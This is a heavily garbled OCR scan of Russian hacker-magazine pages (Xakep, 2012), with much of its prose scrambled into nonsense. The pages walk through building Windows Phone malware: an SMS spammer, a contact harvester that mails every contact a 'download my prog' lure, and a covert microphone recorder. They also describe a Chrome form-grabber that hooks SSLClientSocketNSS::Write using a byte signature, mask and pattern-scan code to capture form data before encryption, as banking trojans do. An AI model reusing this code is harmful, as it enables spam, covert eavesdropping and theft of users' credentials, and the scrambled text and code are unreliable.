ч е го следует, ч ведь !nо­

коnаться на содер ж да м в отношении м своего т е л е фона?

К тому ж е безоnасн ос ть- nр ежик д е во се го . !

вр е д систе м е .

Ка ж дое nрилож е ни е выnолняется во своем

nространстве- для а м ере

0.

Пользователю заnр е щен прежде со туn для фа й ло­

.NET Compactl , с

те нциально! ни для ак в рассуждении е ПО безвыгодный может намести

0.

SmsComposeTa sk msgSMS=пеw SmsComposeTask(); msgSMS. Body="Наше зло-сообщение" ;

WINDOWS PHONE

ности своей мобильной ОС .

0.

0. 6.

разъединенно с дру г равно х nриложений , таким образом , для ни м ни ко так никак не имеет поперед со т у nа, к роме самого nрил ож ения.

03/158/2012

Приложения допускается у из танавливать только из

ichamberl .

Ка ж дое nрилож е ни е х ранит со вои причина

ХАКЕР

Oп N a vigatedTo(N avi g a tioпE ve пtArgs е)

Windows

Рhопе

Marketplace . SSL . Впроч е м ,

Данные nередают из пишущий эти строки вследствие

было бы самобытно , е сл равным образом бы было инач е.

0.

Разработчик м касательно но т проэксплуатировать для лас со

ProtectedData

lна х одящи й ся во nростран -

System .Security.Cryptograph yl,

0. WP 0 nоддерживаетсл е дующие алго­ ритмы шифрования : АЕS, HMACSHA1 , HMACSHA256, Rfc2898DeriveByte s, RSA, SHA1, SHA256 . 9. Встроенный браузер, мобильны й IE , н е nо­ зволяет устанавливатьдоnолнительные nлагины .

00. Приложения,

разработанные далеко не на

Microsoft,

никак не м огутфун ко циониров а ть на фоново м р не личность — змея равным образом м е .

083


MALWARE msgSMS.To=""1928"" ; msgSMS. Show();

}

СПОСОБЫХРАНЕНИЯ

П оследняя коман так точно листинга формирует да отправляет сообщение; остальной адрес на комме нтария х безграмотный нуждается.

МОБИЛЬНЫЙ СПАМ- ЗЛОБОДНЕВНАЯ ТЕМА : ]

Windows Phone nредоставляет nриложениям три способа раздельного хранения информации:

0.

Следующая ради га , которую автор сих строк напишем, короче считыва ть имейлы

Изолированное кладовая пользу кого настроекзаnоминаеттекущее

богатство nриложения nри nереходе с одного режима его работы

на противоположный (исnользуется hаsh-таблица : параметр=значение) .

с списка контактов владельца смартфона равным образом распространять возьми них <щен­

н ую» информацию:). В различие с предыдущей версии мобильной

0. Изолированное закром на файлов да nапок.

оси, во WP 0.5 контактные факты хранятс ваш покорнейший слуга во удобочитаемом на иде

З.

Локальная БД пользу кого реляционных данных служит в целях хране­

на локально й БД . К ним относятся малограмотный всего лишь заезжий дом телефонов

ния множества чопорно уnорядоченных свойств приложения ,

да адреса электронной почты , только да др уг ая рэнкинг что до контактах,

ко которым вnоследствии допускается перевоплотиться не без; nомощью заnроса

забитая пользователем , что-то около почто эа ним дозволяется короче до этих пор да по­

для LINQ, с намерением выбраковать и/или переменить исходняк .

шпионить. Эта БД предназначена токмо в целях чтения , вследствие чего тебе не удастся модифицирова ть эмпирика другими словами присыпать новейший контакт.

Пора пускаться разработку. Создай новомодный WР-проект (об рати внимание , что такое? операционная теория имеет версию 0.5, а SDK-

Таким образом, у разработчика как не быть окладистый ассортимент средств к хранения данных , невзирая бери за глазами достуnа

ко файловой системе устройства.

версию 0.1) держи основе Silveгlight , перейди во обложка С#-кода равным образом добавь в почин ссылку бери протяженность имен Micгosoft.Phone.UseгData, обесnечивающее работу со пользовательскими данными. Не забудь также присыпать указанное на прошлом разделе nространство имен

же хорэ возвращен на переменной класса CoпtactsSeaгchEve ntAгgs .,

с целью работы из мылом. Второе, что-то следует сделать, - сие провозгласить

а вернется некто лишь на событии SeaгchCompleted, переработчик

глобальную переменную класса Contacts, ради заключать ход

которого требуется зарегистрировать на функции MainPage:

для контактным данным юэера. Для инициализации nоиска пишущий сии строки вы­

зываем изо функции MainPage функцию ln itSeaгch, которая во строчке

contacts.SeaгchAsync(Stгing. Empt y, FilteгKi nd. DisplayName, null)

contacts.SearchCompleted +=new EventHandler< ContactsSearchEventArgs >(contacts_SearchCompleted)

производит асинхроичный разведка в соответствии с контактным данным . У функции

SeaгchAsync три дружка метра: связь поиска (если оный параметр

Теперь опишем сие событие:

пустой, ведь ищется всё); чета метр, соответственно которому проводится выбор-

ка ( не возбраняется обыскивать в соответствии с имени, имейлу, факс у телефону иначе говоря просто указать None, разве параметр никак не важен, наравне на нашем случае); объект, в каковой помещается окончание поиска, или — или nul l. Р езульта т всё рав-

void contacts_SearchCompleted(object sender, ContactsSearchEventArgs е) { int max=e.Results.Count(); // ко ол-во конта ктов string adr; try { // кайфовый уклонение падения nроги for ( int i=е ; i < max; i++) i f (e.Results.ElementAt(i).EmailAddresses !=null) { adr=e.Results.ElementAt(i). EmailAddresses.First() . EmailAddress ; // берем мыло i f (adr !=_ null && adr !="" ) 01 кабы оно невыгодный непропорционально нулю SendEmail(adr); // убор мь~о : )

catch (Exception

ех)

{ }

} Из стих видно, что-то перво-наперво пишущий сии строки берем точка соприкосновения величина найденны х контакто в, после во цикле выбираем ранний e-mail-aдpec каждого кон­

такта (у него может фигурировать неграмотный одно мыло) и, если бы сей код безграмотный nустой , вызываем функцию SendEmail, которой п ередаем примеченный адрес. Это аспидски простая функция:

void SendEmail(String adr) { EmailCompos!;Task email=new EmailComposeTask()_; email . То_=adr; email. Subject=" Holy mail" ; email. Bqdy="Down_load my prog" ; email. Show(); } Как завсегда , по нитке прокомментированный распечатка ищи бери ди ске

(проект EmaiiSeпder). Интерфейс Overhear2

ХАКЕР

03/158/ 0012


Малварь чтобы мобильных <<око шек »

ПОДСЛУШИВАТЕЛЬ

ларингофон относится ко пространству имен

В прошлом разделе у нас из тобой был ветром подбитый расела бон, вследствие чего

xna,

дьявол управляется со­

бытийным механизмом сего цикла:

ну-кась напишем что-нибудь соответственно еложнее равным образом поинтереснее. Как долженствует

с заголовка раздела, следующая наша малварь склифосовский выслушивать равно со­ хранять всё-таки улавливаемые смартфоном звуки. Для ясности кратко

DispatcherTimer dt ; new DispatcherTimer(); dt.Interval ; TimeSpan . FromМilliseconds( ЗЗ );

расскажу об алгоритме ее работы, во вкусе ваш покорный слуга его вижу. Волга зумеется, наш брат

пишем данный прототип офигенно на исследовательских целя х!;]

Чтобы совмещать вероятность разделывать казус таймера, про­

После запуска· наше приложениена изрядно секунд охватывает

исходящее от установленный с чувством времени, подписываемся

ларингофон равно записывает окружающие звуки во поток, впоследствии выключа­

получи и распишись событие: dt.Тick

ет ларингофон равно записывает лавина во обложка во изолированном хранили ­

команды dt.Staгtll запускаем таймер.

ще смартфона, потом чего, наконец, загружает изо сего хранилища

+; new EventHandler(dt_Тick). Затем не без; через

Второй регулятор выдержки времени нужен для того того, дабы изъять микрофон,

обложка да воспроизводит его. Результат автор узнаём токмо в дальнейшем

не потерять целый короб во файле да восстановить его. Таким образом, чтобы

исполнения последовательности всех сих действий , благодаря тому помимо

инициализациивременного интервалатаймера нужендлительный

малвари моя персона приготовил чтобы тебя адденда (Оvегhеаг2 , ищи получай дис­ ке], на котором каждая отдельная процедура выполняется согласно нажатию

с чувством (например,

кнопки, воеже твоя милость был способным подробней усваивать целое сии операции.

конструктора инициализируем микрофон, вызывая самсписную

Если хочешь построить цель вкупе со мной от нуля, сгенерируй

небывалый Silveгlight- программа интересах

WP.

00 000 мс], nлюс должно задатьдругую функцию

на качестве обработчика события, всё остальное ведь а самое. В конце

Пер ейди на начин файла С#- заключение

функцию SetupMicгophone. Сначала возлюбленная проверяет, с тем дефолтны й

стакан безграмотный был равен нулю. Если сие до каким-то причинам невыгодный так,

равно подключи следующие пространства имен:

т~делатьнечег~выхо партия .

using using using using using

вероятность протоколировать аудио продолжительностью полсекунды.

Затем устанавливаем аудиобуфер микрофона, в надежде почерпнуть

System.IO; Microsoft.Xna.Framework; Microsoft.Xna.Framework.Audio; System.Windows.Threading; System.IO.IsolatedStorage;

Заполняем нулями обнародованный прежде поток. После сего регистри­ руем событие, возникающее рядом заполнении буфера. Вызов функ­ ции WгiteWavHeadeг рассмотрим до некоторой степени позже, на срок некто к нас

отнюдь не ультра- важен . Наконец, от через строчки micгophone.Staгtll включаем стопка держи протокол окружающих звуков. В последней

В первом изо них находятся классы в целях работы от потоками равным образом фай­

лами, умереть и безвыгодный встать втором- FгamewoгkDispatcheг (если коротко, обработ­

строчке функции устанавливаем ватерпас громкости . Настала кортеж перипетии первого таймера , которое вызывается

чик циклических событий], на третьем, собственно, сам по себе микрофон,

каждые

на четвертом -таймер для того генерации циклических событий (ниже

возле этом безвыездно происходящие исключения игнорируются. С момен-

03

миллисекунды . В нем всего обновляе тся состояние,

рассмотрим, в целях а спирт нужен], а на пят ом - фонды с целью работы

та запуска программы равно накануне тех пор, нонче по рукам запись, аргумент

не без; изолированным хранилищем. Дале е на автоматично сгенери­

гecoгdingStopped имеет нулевое значение. Когда истечет временной

рованном классе MaiпPage объявим глобальные переменные iсм.

зазор второго таймера равным образом его происшествие хорошенького понемножку сгенерировано, буква

исходник]. П ервая безграмотный представляет особого интереса, на ней без затей

аргумент примет истинное значение. При заполнении аудиобуфера

содержится кличка файла интересах сохранения полученного звука равно его по­

микрофона (это происходит грубо каждые 000 миллисекунд] вы­

следующего считывания. Во дальнейший переменной объявляем микро­

зывается факт micгophone_BuffeгReady.

фон, которому за единый вздох а присваиваем роль <<ПО умолчанию» во нынешнее сезон безвыездно смартфоны вместе с ОС

Windows Phone только одним микрофоном, потому-то извлечение незначительный :].

оснащаются

В нем способности извлекаются изо аудиобуфера микрофона да записы­ ваются на поток. Е сли подле этом аргумент гecoгdingStopped принима­ ет истинное значение, значит, писание завершена, равным образом нам никуда не денешься

Затем объявляем переменную , для которой nривязывается nоток. В этом потоке сохраняются аудиоданные во поток сеанса

исключить микрофончик равным образом уберечь целый короб данных на файле. Возможно, твоя милость задалея вопросом: с каких щей да мы от тобой далеко не выключаем микро­

заnиси, на пороге сбросом на хранили ще . Массив байтов (следующая

поле напрямую рядом генерации перипетии второго таймера, а от­

переменная] используется с целью пром ежуточного хранения данных.

кладываем размыкание накануне следующего заполнения грудь данных?

Когда вн утре нний бампер микрофона заполняется, исходняк изо него

Это нужно пользу кого того, так чтобы данные, имеющиеся на буфере для моменту

скидываются на текущий массив, равно всего лишь а там записываются на немного

возбуждения действие тика таймера, были сохранены . Если бы автор

токовище . Булевекая аргумент гecoгdingStopped указывает действие,

вмиг выключили микрофон, так данные, находящиеся на его буфере,

выполняемое во этот момент, ведь есть, буде возлюбленная равна нулю, так тому и быть

были бы уничтожены.

заnись (если стопка до сего поры включен], во nротивном случае осущест­

Функция SaveFilei] (см. листинг], вызываемая пользу кого сохранения фай­ ла, попросту создает обложка на изолированном кладовая равно записывает

вляется воспроизведение.

В конструкторе класса объявим пара таймера класса

на него всё сель со введение равно перед конца.

DispatcheгTimeг крестик инициализируем их временные значения .

Первый регулятор выдержки времени нужен к имитации игрового цикла

xna.

Так вроде

private void SaveFile() {

/ /сох поранить обложка

ЖИЗНЕННЫЙ ЦИКЛ ПРИЛОЖЕНИЯ В какой угодно период времени может материализовываться

сверху другое, во-первых переводится во дрючащийся нагрузка

во процесс жизненного цикла приложения не без; ним

одно приложение, да сие ахти важно- звезда на том,

ldoгmaпt), только его текущее имущество сохраняется,

происходит с двух до самого четырех событий: зуон

что такое? сие вставка lтеоретически) малограмотный сможет

в надежде присутствие последующем запуске дополнение

Lauпchiпg на час запуска, Closiпg на секунда

во фоне послать эсэмэску держи оплачиваемый штучка тож

возобновило работу. Процесс захоронения

закрытия,

произвести некоторые злодеяния. Этотход позволяет

приложений

захоронении) равно Activating подле восстановлении

доставать наилучшей производительности, да

tombstoniпg. Если работающему приложению

с

безвыгодный издерживать запас батареи нате фоновые задачи. Когда

далеко не до черта ресурсов, так ОС завершает (teгmiпate)

производится оставление равно регенерация

юзер переключается не без; одного приложения

спящие приложения на порядке их запуска. В общем,

состояния приложений, дозволяется разделывать .

ХАКЕР

03/158/ 0012

(active -> doгmaпt) получил этноним

Deactivating около деактивации (при

tombstone. Все сии события, на которых как правило

085


MALWARE using (IsolatedStorageFile isoStorage= IsolatedStorageFile . GetUserStoreForApplication()) { using (IsolatedStorageFileStream isoStream ~ isoStorage.CreateFile(FileName)) { isoStream . Write(stream . ToArray(), е, stream.ToArray().Length);

Однако буде соблюсти армия во таком виде, на каком спирт в тот же миг есть,

в таком случае его неграмотный откроет ни одна график для того воспроизведения . Чтобы привести влажно й сель данны х для понятному во иду, надо добавить заголовок . Таким образом, у нас получится wаv-файл. Е сли нужно получить обложка другого типа, ведь надо ручьем данны х нужно дополни­

тельно поизвращаться

Разработка малвари

Overhear

:1. Но равным образом с целью выудить безыскуственный wаv -фа йл, нам

надо пробовать величина полей заголовка. В своем благе швейцар­

ский системщик Дамиан l goo.gl/ufeЗyl предлага ет замечательное решение, которое заключается во добавлении двух функций ! их код есть для странице) . Не вижу смысла им малограмотный воспользоваться! Функцию WriteWavHeader, которая создает начальные причина для заголовка, требуется пригласить во начале дневной журнал lв нашем случае- во функ ­ ции SetupMicrophonel, а функцию UpdateWavHeade r, обновляющую

При использовании объекта изолированного хранилища возлюбленный откры­ вается к чтения всего-навсего затем проверки того, существует ли вообще файл указанного имени. Звук с открытого файла воспроизводится с через объекта mediaSound. Воспроизведение начинается после привязки файлового потока ко данному объекту да установки позиции, с которой надлежит начить проигрывание, да громкости звучания.

Кроме того, дозволительно имитировать армия аудиоданных из первых рук

заголовочные данные, которые зависят через размера записываемого

изо памяти. Для сего порядочно сформировать мира звукового эффекта

потока,- на конце записи, накануне сбросом данных на обложка !то убирать

со следующими параметрами: молчаливый наводнение во памяти, преобразован­

на функции microphone_BuffeгReady, за окончания записи, однако на пороге

ный на сосредоточение байтов, колебание звука !есть предопределенные значения)

вызовом SaveFilel. В результате во изолированном храни лищ е короче

равным образом наличность каналов звуковых данных !м оно сиречь стереоl. Затем не­

сохранен полновесный wаv-файл. Последне е действие, выполняемое

обходимо пригласить путь Play данного объекта:

во обработчике перипетии microphone_BufferReady !кроме обнуления переменной recordingStoppedl,- сие приглашение функции PlayFile для воспроизведения звука с сохраненного файла. Вот что выглядит эта функция:

private void PlayFile() . {. //воспроизвести сохра ненный файл using (var isf= IsolatedStorageFile.GetUserStoreForApplication()) i f (isf.FileExists(FileName)) { . using (var isoStream=isf.OpenFile(FileName, FileMode.Open, FileAccess.Read)) { mediaSound.Stop(); mediaSound.SetSource(isoStream); mediaSound.Position=System.TimeSpan.FromSeconds(e); mediaSound.Volume=20; mediaSound.Play();

sound=new SoundEffect(stream.ToArray(), microphone.SampleRate, AudioChannels.Mono); sound. Play(); Вот равно по сию пору внутренние резервы нашей жмет вари! Тем невыгодный менее, имеются пла­ ны за ее развитию : для примеру, ввиду изо ОС Windows Phone нельзя отправлять корреспонденция вместе с вложениями, придется уливать файлы держи какой­ нибудь сервер. Но сим автор сих строк займемся на будущем!

ЗАКЛЮЧЕНИЕ В статье наша сестра провели осмотр системы безопасности Windows Phone 0.5, рассмотрели возможные коричневато-зеленый да разработали собственную малварь.

WP- королем известная система, равным образом на будущем симпатия будеттолько набирать аудиторию. Так в качестве кого строй имеет мощные имущество для того обе­ спечения безопасности, а приложения во ней устанавливаются исключительно

с Marketplace Hub !где подлежат обязательной модерации), у малвари практически не имеется потенциал nоnасть для телефон. В в таком случае а миг раз­ витие малвари безграмотный есть расчет в месте, nоэтому будем немигающе доглядывать

}

ради дальнейшими событиями , а может быть, да около м ем во них участиеl :Х:

ВЫПОЛНЕНИЕ ПРИЛОЖЕНИЙ WP 0 предоставляетвыполняемому приложе­

равным образом драйверы уровня ядра, следовательно,

выполняются драйвера пользовательского

нию изолированное пространство- камеру.

разработчики nрикладны х программ долж­

уровня .

Приложение, находящееся на этой камере,

ны ускользать использования сего режима ,

безграмотный имеет доступа для данным других приложе­

особенно разве они хотят рассеять свое

дефолтный работа выполнения предуста­

ний. При этом существует цифра вроде камер:

приложениена

новленных программ , таких в духе

0. The Trusted Computing Base (ТСВ)- депо

потому как выполняющееся получи и распишись этом уровне

доверенного выполнения . На этом уровне выполненияприложениеснаивысшими

086

Windows Phone Marketplace,

приложениенепройдетпроверк~

0. The Elevated Rights Chamber (ERC)- каме­

0. The Standard Rights Chamber (SRC)MS Office Explorer 0 да т. д . 4. The Least Privileged Chamber (LPC)- уро­ MoЬile, lnteгпet

вень наименьших привилегий, дефолт­

привилегиями имеет подступ ко во всем ресур­

ра повышенных прав . Здесь приложения

ный строй выполнения приложений

самостоятельно смартфона, начиная фото- равно видео­

имеют теледоступ ко по всем статьям ресурсам, вдобавок

отнюдь не через

камеру, акселерометр да иные датчики.

стратегий безопасности, так глотать ко данным ,

предоставляются токмо те ресурсы, кото­

В этом режиме выполняется сердцевина системы

устройствам да датчикам. В этом режиме

рыезапрашиваются подле инсталляции.

Microsoft. В этой камере приложению

ХАКЕР

03 / 058/ 001 0


Preview КОДИНГ ФОРМГРАББЕРДЛЯGООGLЕСНRОМЕ

088

Перехватформ-это особо востре­ бованнаятехнологиявтрояна~таккак именно от ее nомощью осуществляется

для р ажабольшейчасти личныхданных

J

nользователей. Формграббером для lnteгnet Ехрlогег равным образом

Mozilla Fiгefox у а

пустынно малограмотный удивишь-такие решения

стары равным образом общеизвестны. А чисто граббинг для

Google Сhгоmе-это своего рода

эксклюзив, не без; которым твоя милость сможешь разо­

браться, nрочитав эту статью. Д ело-то, как оказывается, нехитрое-нужно

только раскопать функцию, которая во качестве одного с nараметров nринимаетданные

телосложение внезашифрованном виде да nо­ ставить получи нее хук.

КОДИНГ

UNIXOID

J)) И ЦЕЛОГО СИ МАЛО Приразработкехакерскихутилитчасто встречаются задачи, которые не выйдет

решитьсиламиобычногоnреnроцессора Си. В этакий ситуации выручит Python!

ФЕДОРИНОСЧАСТЬЕ Последние версии д истрибутива Fedoгa выделяются несколькими интересными равно

дажеинновационными изменениями. Но насколько они хороши?

SYN\ACK

01

В ПОИСКЕИНСАЙДЕРА Выявить да nредотвратить утечку кон­

фиденциальнойинформациисnособы DLР - системы. Мы решили nрове из ти не­

немаленький тест-драйвтаких решений.

ХАКЕР

03/158/201 0

01

ДОСТУЧАТЬСЯ ДО НЕБЕС Расширияемграницысоnрикосно во е н ия в е ба равным образом обычного Linux-дecк т o n a, объеди н яя nривычную систе м у да

облач н ые сервисы.

FERRUM

01

ИСПЫТАНИЕ НАГРУЗКОЙ Какие инструменты равно n одходы могут nомочь Djаngо-nриложению выдержать баснословные нагрузки? Ответ в во­ nрос - на этом материале.

ОТ«ВИНТА>>! Го н яем полдюжины за исключением ш нихжесткихдисков

во разных бе н чмарках . П ора опре д е­ лить, кто такой изо них может похвас т а ть ся

максимальным бойко дейс т вием.

087


КОДИНГ

Гуля Сергеев [seseгegalagmail.гu, Ыotloгe.Ыogspot.coml

р

для того

Google Chrome ИССЛЕДУЕМ ОТПРАВКУ ЗАШИФРОВАННЫХ ФОРМ И СПОСОБ ИХ ПЕРЕХВАТА В БРАУЗЕРЕ

OTGOOGLE

• qoo.qi/Cj4PI OllyDbg к

nлaгин

создания сигнатур

равно масок .

аоо .аl/гdдlо -то

а самое, токмо

АЛЯ IDд .

• qoo.gl/ulqMb -интересная

линия получи форуме , nосвящённая

перехвату форм в Chгome .

• qoo.ql/sZWwZ об прологе равно эnилоге .

Для генерации прологов равно эпилогов я использовал

функцию без модификатора

_ declspec( naked), рассматривал её в дизассемблере и копировал начало и конец.

Перехват форм- сие особо востребованная технология во банковских троянах, этак на правах то есть со ее помощью осуществляется угон большей части личных

данных пользователей. Формграббером пользу кого lnteгnet

Ехрlогег да

Mozilla

Fiгefox еще никого нет никак не удивишь- такие

решения стары равно общеизвестны . А видишь граббинг к

Google

Chгome- сие доколь эксклюзив, вместе с которым автор

нынче равно разберемся .

088


Формграббер д ля

Google Chrome

~~----- -~ ~~~~~~-----

~~

Рис .

0. Сигнатурн ый

Н

n касательно обвинение во

Р равным образом с.

OllyDbg

0. Поис ко SSL- зa n poca

да что сложного во перехвате нет, нужно только что откопать функ­

SRV*c:\code\symbols*http://msdl . microsoft.com/download/ symbols;SRV*c:\code\symbols* http://chromium- browsersymsrv.commondatastorage.googleapis.com

цию, которая на качестве одного с параметров принимает данные комплекция внеза ш ифрованном виде равным образом влепить

сверху нее хук. В библиотекой

IE такая функция, HttpSendRequest, экспортируется wininet .dll, во Fiгefox сие ипостась PR_Wгite с библи­

Здесь c:\code\symbols- папка, куда-нибудь складываются закачанные

отеки пspг4.dll, а что мы искал аналогичную функцию чтобы Хрома, сейчас расскажу.

отладочные символы.

0.

Открыть мало-мальски окон с список View. Рекомендую обнаружить окна Commaпd, Registeгs да DisassemЬiy.

ИССЛЕДОВАНИЕ С перехватом незашифрованных форм на

Chгome недостает ника­

Google

ких проблем, хватает внести хук для стандартную экспорти­

0. 6. 7.

Запустить Chгome. Открыть подбор

File-7 Attach to а

Pгocess ...

Выбрать первый встречный chгome.exe равно расстараться ОК.

руемую функцию WSASeпd. Сделать сие хватит легко, равным образом ма­ териала на интернете получи и распишись эту тему предостаточно. П оэтому отличается как небо через земли

С через команды <<х chгome*!*SSLCiientSocketNSS: : Wгite>>

сконцентрироваться возьми поиске функции, которая принимает эмпирика

!которую полагается подключать во окне Commaпdl автор этих строк нашёл функцию

форм на SS L-соеди н ении единаче д насчёт шиф р ова н ия .

SSLC i ientSocke t NSS::Wгite, а впоследствии да SS L CiientSocketWin::Wгite. П о­

Мои п оп ы тки выискать подобную функцию от помощью закончились неудачей, благодаря тому аз многогрешный начал рыть во

Google

OllyDbg и мгновенно

наткнулся держи страницу со полным исходным кодом браузера

ставил получи них брейки lbгeakpointsl равно зашёл во кровный Gmаil-аккаунт. Программа прерывалась только лишь получай функции

SSLCiientSocketNSS

::Wгite.

lgoo .gi/8SgW2 , все же Chгome - опенсорсный проект). Висходниках допускается позаниматься , указав во соответствующем поле комплекция поиска, аюшки? обыскивать наша сестра хотим во файлах С++ . П ервый запрос, некоторый пришел м н е на голову,- сие

«ssl socket>>.

В процессе поиска в соответствии с э т ому запросу ваш покорный слуга мгновенно наткнулся возьми обложка

ssl_socket .h lgoo.gl/6cw0w l, хотя ни аза интересного на нём безвыгодный на­

О nисани е фу-ты нк ции,

сверху йден н по отношению й во равным образом из х од н ом ко оде

int SSLClientSocketNSS: :Write( IOBuffer* buf, int buf_len, const CompletionCallback& cal l back

шел, зато во левой части экрана увидел древо файлов из вкусными названиями. Меня интересовало всё , в чем дело? имело во названии

·

ssl socket, а во особенности файлы ssl_clieпt_socket_nss . cc, ssl_ client_socket_openssl.cc да ssl_clieпt_socket_wiп.cc. Я знал, почто

передается ягодицы вместе с РОSТ-запросом. Л огично предположить, который

на Fiгefox перехватывается цель PR_Wгite, равно решил пошакалить

во переменной со типом IOBuffeг:

равно

Оставалось всего-навсего выяснить, каким образом этой функции

равно ее. В результате получай первой но с появившихся двух страниц оказался обложка

ssl_client_socket_nss.cc.

Саму функцию ваш покорный слуга на нем таково

равно невыгодный нашёл, за всем тем в эту пору знал, чей возлюбленная вызывается.

class NET_EXPORT IOBuffer : puЫic base: :RefCountedThreadSafe<IOBuffer>

Просмотрев листинг, пишущий эти строки наткнулся нате функцию SSLCiientSocketWin::Wгite, чем-то напоминающую PR_Wгite. В дру­

puЫic :

гих фай л ах, п еречисленных выше, получай шлись аналогичные функции:

IOBuffer(); explicit IOBuffer( int buffer_size); char * data() { return data_; } protected : friend class base: :RefCountedThreadSafe<IOBuffer>; explicit IOBuffer( char * data); virtual -IOBuffer(); char * data_; };

SSLCiientSocketOpenSSL: : Wгite да SSLCiieпtSocketWin::Wгite. Следо­ вало их проверить.

Для сего требовался настройщик равным образом адреса функций. Я восполь­ зовался официальной инструкцией согласно настройке да отладке

Google

Chгome, которая лежит согласно адресу goo.gl/fwt1S . Е сли вкратце, в таком случае для того отладки Хрома нужно учинить следую­ щее:

0. 2. 3.

Запустить WinDBG . Открыть карточка

File -7 Symbol File Path.

Вставить во появившееся окошечко следующую строку:

ХАКЕР 03/158/201 0

Так что строй сложная да непонятно, какое во действительно-

089


КОДИНГ

EIP 0287SR4C chroNe_1.0287SR4C С 0 ES ае23 02Ьi t et FFFFFFFF! Р 0 CS eet В 02Ьi t et FFFFFFFF! ~ 0 SS е023 02Ьi t 0( FFFFFFFF!

0 0 S е

Т е о е о е

ST0 ST1

ST2

OS 0023 02Ь 0t FS е03В Э2Ьi t GS ее0е NULL

е 0FFFFFFFF 0 7FF~F000(

FFF!

емрtу

et<~Ot~ емрtу

SТЗ er>IPtY

ST4 er'loty

STS ST6 ST7

Рис.

емоtу емрtу емрtу

0. SSL-зanpoc найден

сти снятие у данных, ми пришлось разыскивать справочник получи и распишись конгломерат

Здесь-то наша сестра равным образом будем программно отыскивать надсыл нашей неэкспорти­

символов вручную. Для сего пишущий эти строки во поуже привычном

OllyDbg поставил брейк бери функцию SSLCiientSocketNSS: : Wгite lсм. падди 01, рядом оста­

руемой функции.

новке взял начальный параметр изо стека равно начал перечислять на нём

сигнатурный разглядывание . Сигнатурой функции !последовательностью байтов, объединение которой склифосовский выполняться поиск! выступят первые

всякий DWORD iсм. чалтык 01. Выяснил ось, сколько беспристрастный DWORD !то вкушать 00Buffeг+81 представ­ ляет собою стрелка возьми конгломерат символов ichaг*l, обеспечивающий

Оптимальным способом про сего на данном случае автор этих строк считаю

04

байт функции, они уникальны для того модуля chгome.dll равно однознач­

однако указывают нате нашу цель.

НТТРS-запрос iсм. чалтык 01. Далее на процессе отладки мы обнаружил, аюшки? заглавие

POST-

зanpoca равно его показатели передаются функции кореш из-за другом, во от­ дельных вызовах. Это подумаешь nонять, неравно определить символичный

брейк-данс получай функцию SSLCiientSocketNSS::Wгite lсм. рис вызывается функционирование да на буфере находится черта

01. Сначала «POST ... >>,а сле­

трескающий повестка поуже охватывает материал формы. Мы сие обязательно учтем.

ПОИСК АДРЕСА Теперь не грех браться для разработке, так глотать для написанию модуля , тот или иной хорошенького понемножку занимать найденную доселе функцию.

дизас1-1 начаJJЫ!РЙ .част.и

nерехватt,~ваемой функции

chrome_lcзeeee!

net: : SSLClientSoc.ketNSS: : Wri te: 02875а4с 05 push еЬр 02875a4d ВЬ.ес mov еЬр, esp 02875a4f 01 push есх. 02875а50 03 push еЬх 02875а51 06 push esi 02875а52 07 push edi 02875а5) . ff7508 push dword ptr [ еЬр+ 0 ] 02875а56 Bbfl mov esi.ecx 02875а58 ЗЗdЬ xo r еЬх,еЬх

Тут должно задуматься, равно как встретить ее приветствие программно, ведь она далеко не экспортируется, а значит, обычным GetPгocAddгess на этом месте

Скопируем первые байты функции равным образом преобразуем их во скопление

байтов IBYTE*I, некоторый назначение поиска сигнатуры принимает

малограмотный быть . В процессе Хрома вкушать неудовлетворительно РЕ-модуля, которые потен­

на качестве параметра совместно со маской сигнатуры, хзндлом равно раз­

циально могут обеспечивать нашу функцию,- сие chгome.exe

мером модуля. Маска служит для того вычленения релятивных равным образом абсо­

равным образом chгome.dll. Отладчик нам субтильно сообщает, что такое? адресок

лютных адресов на сигнатуре, в силу того что вроде они могут переменяться быть

SSLCiieпtSocketNSS::Wгite на правах крат лежит на пределах

каждом запуске. Байты адресов помечаются знаком«?,,, осталь­

dll . Что

говорить, во ней общо находится большая делянка стих браузера.

090

ные байты- наслышан <<Х>>.

ХАКЕР

03 / 058/ 001 0


Формграббер ради Google Chгome

i f (DataCompare((BYTE *)(dwAddress+ i),pbMask,szMask)) return (DWORD)( dwAddress + i ); return

е;

Кто-то может сказать, что такое? текущий схема is f*cking unstaЫe. Однако прошло полгода, вер эта Хрома н ео дн ократно менялась, а сигна т у­

ра всё ещё ра ботает.

ПЕРЕХВАТ ОК , пишущий сии строки нашли а дре не без; функции, теnерь её нужно nерехватить. Для этого nодойдёт неоригинальный сnлайсинг. Д ля те х, кто именно во танке, сnлай­ си н г- сие способ nерехвата функции, основанный нате модификации Рис .

0. Условный брейк-данс получай SSLCiientSocketNSS::Write

ее кода. Самый nростой разновидность материализовать из nл айси нг- за­ менить, перед сохранив, nервые

0 байт

nерехватывае­

мои функции возьми «JMP твоя_функция » . Д ля вызова оригина льн ой

Вызов функции пои ска осуществляется следующим образом:

функции на этом от л учае нужно на осстано свивать э ти

0 байт изо

бу фера ,

а в дальнейшем вызова вновь поменять нате JM P. У сего метода питаться будучи ­

char * Sign="\x55\xBB\xEC\x51\x53\x56\x57\xFF\x75\xeв \xBB\xFl\xЗЗ\xDB" ; // Сигнатура SSLClientSocketNSS :: Write

ственный недостаток. Дело на том, почто разве потом восстановления начальной части оригинальной функции переключится на др угой поток, ведь спирт сможе т породить функцию, не принимая во внимание выше- хук.

char * Mask="xxxxxxxxxxxxxx" ; // маска DWORD SSLAdr=FindPattern(ChromeDLL, Chrome32Size, (BYTE*)Sign, Mask); /1 SSLAdr - домицилий SSLClientSocketNSS: :Write

Есть да др угой средство сплайсинга - со где-то называемым «т рам­

пл ином>>. Как равным образом на предыдущем способе, во нем во начинание функции также встраивается

JMP получи и распишись хук, хотя держи этом соотношение заканчива­

ется . Для вызова оригинальной функ ц ии рядом т аком сплайсинге её начальная деление далеко не изумительный сста навливается . Этот дорога неграмотный об ладает указанным недостатком.

При усище тановке пере х текстиль не мудрствуя лукаво создается буферс пр авами

Сама деятельность выглядит так:

bool DataCompare( const ВУТЕ * pData, const ВУТЕ * bMask, const char * szMask

PAGE_EX ECUT E [устанавли на аются из через ViгtuaiPгotect], в кой копи р уются первые 0 [размер д жампа] либо побольше байт из основные принципы функции . Размер джампа может переваливать 0 байт, та к как нам нужно ксеронуть аsm - инструкции целиком, в надежде они

for ( ; * szMask; ++szMask, ++pData, ++bMask

смогли воплощаться на другом месте. Чт обы об пр еде плескать , сколько в точности байтов списывать равным образом идеже край стоит на повестке дня инструк­

{ i f ( * szMask=='х' return false ;

&&

* pData !=* bMas k )

